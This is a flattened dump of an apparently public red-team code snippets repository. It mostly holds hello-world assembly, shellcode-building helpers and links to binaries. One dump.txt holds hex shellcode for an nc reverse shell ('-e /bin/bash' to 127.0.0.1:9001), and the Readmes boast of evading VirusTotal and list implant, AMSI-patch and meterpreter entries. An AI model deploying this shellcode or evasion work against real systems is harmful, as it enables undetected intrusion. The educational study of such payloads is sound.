reverse_shell.exe │ ├── reverse_shell.obj │ └── shell.bin │ ├── shell.bin │ └── xorencrypt.py ├── LICENSE.md ├── Powershell ├── Readme.md └── amsi-patch.ps1 ├── Presentations ├── .placeholder └── Building Skynet_as_submitted.pptx ├── Python ├── PushingP │ ├── pushingpayloads.py │ └── pushingpayloadsv3.py ├── Readme.md ├── smuggler │ ├── OUT │ │ └── test.txt │ ├── Readme.md │ ├── in.txt │ ├── out.txt │ ├── smuggler.py │ └── test.txt └── utilities │ ├── Readme.md │ ├── aesencrypt.py │ ├── beautify.py │ └── xorencrypt.py ├── Readme.md └── Rust ├── CreateProcessA ├── Cargo.toml ├── Readme.md └── main.rs ├── Readme.md ├── peruns_fart ├── Cargo.toml ├── Readme.md └── main.rs ├── rust_implantv1 ├── implant_rust.exe └── main.rs ├── rust_implantv2 ├── Cargo.toml ├── Readme.md ├── main.rs └── rusty_implant.exe ├── rust_implantv3 ├── Cargo.toml ├── Readme.md ├── main.rs └── rusty_implantv3.exe ├── rust_implantv4 ├── Cargo.toml ├── Readme.md ├── main.rs └── rusty_implantv4.exe └── rusty_calc ├── Cargo.toml ├── Readme.md ├── main-original.rs └── main.rs /Assembly/Linx86-64/Readme.md: -------------------------------------------------------------------------------- 1 | Assembly programs and executables for Linux (x86_64) 2 | 3 | Developed on Kali Linux 4 | 5 | nasm -f elf64 -o PROGRAM_NAME.o PROGRAM_NAME.asm -l PROGRAM_NAME.assembly 6 | 7 | ld -g PROGRAM_NAME.o -o PROGRAM_NAME.bin 8 | 9 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/call_program/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/call_program/call_me.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | section .rodata 3 | msg: db "Hello, world!", 10 4 | msglen: equ $ - msg 5 | a: db 10 6 | b: db 10 7 | c: db 10 8 | d: db 10 9 | e: db 10 10 | f: db 10 11 | g: db 10 12 | h: db 10 13 | i: db 10 14 | j: db 10 15 | 16 | section .text 17 | 18 | _start: 19 | push _start+0x7 20 | jmp _step 21 | mov rax, 0 22 | 23 | mov rax, 60 ;SYS EXIT 24 | mov rdi, 0 ; 25 | syscall ; 26 | 27 | _step: 28 | push _step_2 29 | mov al, [a] 30 | mov bl, [b] 31 | mov cl, [c] 32 | mov dl, [d] 33 | ret 34 | 35 | _step_2: 36 | push rax 37 | add rax, rbx 38 | add rax, rcx 39 | add rax, rdx 40 | mov rbx, rax 41 | add rsp, 0x8 42 | ret 43 | 44 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/call_program/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/Readme.md: -------------------------------------------------------------------------------- 1 | A more performant way of generating custom shellcode. Rather than clunky manual stack manipulations we're able to leverage NASM's ability to generate 2 | relative addresses to generate injectable shell code. 3 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me.asm: -------------------------------------------------------------------------------- 1 | DEFAULT REL 2 | 3 | ; nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O0 4 | ; ld -m elf_x86_64 -o call_me call_me.o 5 | 6 | global _start 7 | 8 | section .text 9 | 10 | _start: 11 | 12 | mov rbp, rsp ; build stack 13 | sub rsp, 0x48 14 | 15 | mov rax, 59 ; execve 16 | 17 | xor rcx, rcx ; clear stack 18 | push rcx 19 | 20 | lea rcx, [rel arg1] ; push arguments 21 | push rcx 22 | 23 | lea rcx, [rel arg0] ; push command 24 | push rcx 25 | 26 | lea rdi, [rel arg0] ;cmd 27 | lea rsi, [rsp] ;args 28 | xor rdx, rdx ;env 29 | syscall 30 | 31 | xor rdi, rdi 32 | mov rax, 60 33 | syscall 34 | 35 | arg0: db "/usr/bin/echo", 0 ; COMMAND GOES HERE 36 | arg1: db "PAYLOAD GOES HERE!", 10, 0, 0 ; ARGUMENTS GO HERE 37 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.so -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54881ec4800000048b83b000000 2 | 000000004831c951488d0d3600000051 3 | 488d0d2000000051488d3d1800000048 4 | 8d34244831d20f054831ff48b83c0000 5 | 00000000000f052f7573722f62696e2f 6 | 6563686f005041594c4f414420474f45 7 | 532048455245210a0000 8 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/system_O3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system_O3.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/Readme.md: -------------------------------------------------------------------------------- 1 | This exercises develops a payload that calls fork(), then executes our standard /usr/bin/echo payload within the child process. 2 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54881ec480000004831c95148b8 2 | 39000000000000000f05488d0d1e0000 3 | 00488d1d0c000000483d00000000480f 4 | 44cbffe14881c4480000004889ecc348 5 | b83b00000000000000488d0d27000000 6 | 51488d0d1100000051488d3d09000000 7 | 488d34244831d20f052f7573722f6269 8 | 6e2f6563686f005041594c4f41442047 9 | 4f45532048455245210a0000 10 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/how-to: -------------------------------------------------------------------------------- 1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3 2 | ld -m elf_x86_64 -N -s -o call_me call_me.o 3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt 4 | python beautify.py 5 | copy into payload section of system.c 6 | gcc -m64 -g system.c -o system.bin -O0 7 | ./system.bin 8 | 9 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/system.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/useful.txt: -------------------------------------------------------------------------------- 1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200 2 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/Readme.md: -------------------------------------------------------------------------------- 1 | This payload implements a fork followed by a nc reverse shell in the child process. 2 | 3 | 4 | ![image](https://user-images.githubusercontent.com/22229087/203710638-5a41b2f5-af9d-4dcf-9c97-6e23826893a5.png) 5 | 6 | 7 | The importance of our methodology is validated if we generate a standard msfvenom payload and upload it to virustotal. 8 | ![image](https://user-images.githubusercontent.com/22229087/203712181-d61dff5a-bd34-40a1-98ce-eb1d42d5bbfb.png) 9 | 10 | 11 | ![image](https://user-images.githubusercontent.com/22229087/203712257-54fe4bba-5d74-4185-9f35-f497aeec61e7.png) 12 | 13 | 14 | We can compare this with our custom system.bin file that we've crafted, and here are the results! 15 | ![image](https://user-images.githubusercontent.com/22229087/203712643-15d4abd4-86bb-46b6-a470-82553d68c8cb.png) 16 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54881ec480000004831c9515151 2 | 5151595959595948b839000000000000 3 | 000f05488d0d13000000488d1d170000 4 | 00483d00000000480f44cbffe14881c4 5 | 480000004889ecc348b83b0000000000 6 | 0000488d0d5400000051488d0d420000 7 | 0051488d0d3000000051488d0d250000 8 | 0051488d0d1100000051488d3d090000 9 | 00488d34244831d20f052f7573722f62 10 | 696e2f6e63002d65002f62696e2f6261 11 | 7368003132372e302e302e3100393030 12 | 310000 13 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/how-to: -------------------------------------------------------------------------------- 1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3 2 | ld -m elf_x86_64 -N -s -o call_me call_me.o 3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt 4 | python beautify.py 5 | copy into payload section of system.c 6 | gcc -m64 -g system.c -o system.bin -O0 7 | ./system.bin 8 | 9 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/system.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/useful.txt: -------------------------------------------------------------------------------- 1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200 2 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/hello_world/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello -------------------------------------------------------------------------------- /Assembly/Linx86-64/hello_world/hello.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/hello_world/hello_world.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | mov rax, 1 ; write( 7 | mov rdi, 1 ; STDOUT_FILENO, 8 | mov rsi, msg ; "Hello, world!\n", 9 | mov rdx, msglen ; sizeof("Hello, world!\n") 10 | syscall ; ); 11 | 12 | mov rax, 60 ; exit( 13 | mov rdi, 0 ; EXIT_SUCCESS 14 | syscall ; ); 15 | 16 | section .rodata 17 | msg: db "Hello, world!", 10 18 | msglen: equ $ - msg 19 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/print_args/print_args: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args -------------------------------------------------------------------------------- /Assembly/Linx86-64/print_args/print_args.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/push_ret/test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test -------------------------------------------------------------------------------- /Assembly/Linx86-64/push_ret/test.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/push_ret/test.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.o -------------------------------------------------------------------------------- /Assembly/Readme.md: -------------------------------------------------------------------------------- 1 | Assembly programs designed for educational purposes. Assembly is essential to understand for payload crafting, reverse engineering, and malware development. 2 | -------------------------------------------------------------------------------- /Assembly/Winx32/Readme.md: -------------------------------------------------------------------------------- 1 | Win32 programs written in assembly. 2 | 3 | nasm -f win32 PROGRAM_NAME.asm -o PROGRAM_NAME.obj -l PROGRAM_NAME.assembly 4 | 5 | gcc PROGRAM_NAME.obj -o PROGRAM_NAME.exe 6 | -------------------------------------------------------------------------------- /Assembly/Winx32/hellow.asm: -------------------------------------------------------------------------------- 1 | global _main ; declare main() method 2 | extern _printf ; link to external library 3 | segment .data 4 | message: db 'Hello world!', 0xA, 0 5 | message_2: db 'Hello again!!', 0xA, 0 6 | section .text 7 | _other_2: 8 | push message_2 9 | call _printf 10 | pop edi 11 | ret 12 | _other: 13 | push message 14 | call _printf 15 | pop edi 16 | ret 17 | _main: 18 | push _main+0xc 19 | mov edi, _other 20 | jmp edi 21 | push _main+0x18 22 | mov edi, _other_2 23 | jmp edi 24 | add esp, 4 25 | ret 26 | ; compile with nasm -f win32 hellow.asm 27 | ; link with gcc hellow.obj -o hellow.exe -------------------------------------------------------------------------------- /Assembly/Winx32/hellow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.exe -------------------------------------------------------------------------------- /Assembly/Winx32/hellow.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.obj -------------------------------------------------------------------------------- /Assembly/Winx64/Readme.md: -------------------------------------------------------------------------------- 1 | Win64 programs written in assembly. I prefer to use link for this architecture in order to leverage Windows function calls more easily. 2 | 3 | nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly 4 | 5 | link /entry:start /subsystem:console hello_new.obj kernel32.lib" 6 | -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello-win.asm: -------------------------------------------------------------------------------- 1 | extern GetStdHandle 2 | extern WriteFile 3 | extern ExitProcess 4 | 5 | section .rodata 6 | 7 | msg db "Hello World!", 0x0d, 0x0a 8 | 9 | msg_len equ $-msg 10 | stdout_query equ -11 11 | status equ 0 12 | 13 | section .data 14 | 15 | stdout dw 0 16 | bytesWritten dw 0 17 | 18 | section .text 19 | 20 | global start 21 | 22 | start: 23 | mov rcx, stdout_query 24 | call GetStdHandle 25 | mov [rel stdout], rax 26 | 27 | mov rcx, [rel stdout] 28 | mov rdx, msg 29 | mov r8, msg_len 30 | mov r9, bytesWritten 31 | push qword 0 32 | call WriteFile 33 | 34 | mov rcx, status 35 | call ExitProcess -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello-win.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello-win.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.obj -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello64.asm: -------------------------------------------------------------------------------- 1 | extern printf 2 | 3 | section .data 4 | msg db 'Hello World!' 5 | section .text 6 | global main 7 | main: 8 | ;write your code here 9 | push rbp 10 | mov rbp, rsp 11 | 12 | mov rcx, msg 13 | sub rsp, 32 14 | call printf 15 | add rsp, 32 16 | 17 | leave 18 | ret -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello64.fas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.fas -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.obj -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/make: -------------------------------------------------------------------------------- 1 | hello.exe: hello64.obj 2 | gcc -o hello64.exe -g hello64.obj 3 | hello.obj: hello64.asm 4 | nasm -f win64 -F cv8 hello64.asm -l hello64.lst -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/test64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test64.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello.asm: -------------------------------------------------------------------------------- 1 | extern GetStdHandle 2 | extern WriteFile 3 | extern ExitProcess 4 | 5 | section .rodata 6 | 7 | msg db "Hello World!", 0x0d, 0x0a 8 | 9 | msg_len equ $-msg 10 | stdout_query equ -11 11 | status equ 0 12 | 13 | section .data 14 | 15 | stdout dw 0 16 | bytesWritten dw 0 17 | 18 | section .text 19 | 20 | global start 21 | 22 | start: 23 | mov rcx, stdout_query 24 | call GetStdHandle 25 | mov [rel stdout], rax 26 | 27 | mov rcx, [rel stdout] 28 | mov rdx, msg 29 | mov r8, msg_len 30 | mov r9, bytesWritten 31 | push qword 0 32 | call WriteFile 33 | 34 | mov rcx, status 35 | call ExitProcess 36 | ;nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly 37 | ;link /entry:start /subsystem:console hello_new.obj kernel32.lib" 38 | -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello_new.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello_new.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.obj -------------------------------------------------------------------------------- /Assembly/Winx64/call_stack/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/call_stack/main_clean.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/call_stack/main_clean.exe -------------------------------------------------------------------------------- /Assembly/Winx64/call_stack/ramp.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | default rel 3 | bits 64 4 | 5 | global onRamp 6 | global offRamp 7 | 8 | ;nasm -f win64 ramp.asm -o ramp.o 9 | onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx 10 | pop rax ; corrupt previous frame 11 | push rdx 12 | lea rax, [offRamp] ; get offRemp address 13 | push rax ; if payload returns, it'll return to our off ramp 14 | jmp rcx ; execute exec_mem 15 | 16 | offRamp: ; slide back into normal execution (dangerous!) 17 | mov rax, [r13] ; get return_address 18 | jmp rax ; jump to return_address 19 | nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/1.popcalc/popcalc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/1.popcalc/popcalc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/2.cmd/new_cmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/2.cmd/new_cmd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/4.changable_api/Readme.md: -------------------------------------------------------------------------------- 1 | 0-null byte WinExec payload with a changeable commond and reworked for a changeable API. CreateProcessA is probably going to be the next API I try to work from this skeleton 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/4.changable_api/any_api.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/4.changable_api/any_api.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/5.ZeroTotal/Readme.md: -------------------------------------------------------------------------------- 1 | Payloads designed to bypass all VirusTotal checks at the time of development. 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/6.meterpreter/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/Readme.md: -------------------------------------------------------------------------------- 1 | Payloads based on: 2 | 3 | https://www.exploit-db.com/exploits/49819 4 | by Bobby Cooke (boku) 5 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/CreateProcess.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "CreateProcess/1.0.0": { 10 | "runtime": { 11 | "CreateProcess.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "CreateProcess/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- 